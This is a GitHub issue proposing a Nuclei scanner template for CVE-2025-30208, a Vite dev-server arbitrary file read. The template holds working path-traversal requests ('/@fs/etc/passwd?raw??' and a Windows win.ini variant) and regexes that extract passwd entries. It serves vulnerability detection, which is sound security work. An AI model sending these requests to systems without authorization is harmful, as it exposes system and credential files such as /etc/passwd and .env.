### ISSUE TITLE
CVE-2025-30208

### ISSUE THREAD

**Issue by Axianke** [projectdiscovery/nuclei-templates#11830]
### Is there an existing template for this?

- [x] I have searched the existing templates.

### Nuclei Template

```yaml
id: CVE-2025-30208
info:
  name: Vite Arbitrary File Read Vulnerability
  author: xianke
  severity: high
  description: |
    Exploits Vite development server path traversal via crafted URL parameters (e.g., `?raw??`), 
    allowing unauthorized access to arbitrary files (e.g., `/etc/passwd`, `.env`). 
    Affects Vite versions <=6.2.2, <=6.1.1, <=6.0.11, <=5.4.14, and <=4.5.9.
  reference:
    - https://github.com/vitejs/vite/security/advisories/GHSA-x574-m823-4x7w
    - https://nvd.nist.gov/vuln/detail/CVE-2025-30208
  tags: vite,lfi,file-read

requests:
  - method: GET
    path:
      - "{{BaseURL}}/@fs/etc/passwd?raw??"  # Linux系统文件
      - "{{BaseURL}}/@fs/C:/Windows/win.ini?raw??"  # Windows系统文件
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"  
          - "\\$fonts\\$"  
      - type: status
        status:
          - 200
    extractors:
      - type: regex
        part: body
        regex:
          - "(root:[^:]+:0:0:[^:]+:[^:]+:[^:]+)"  
          - "\\$fonts\\$[^\\n]+"
```

### Relevant dumped responses

```shell

```
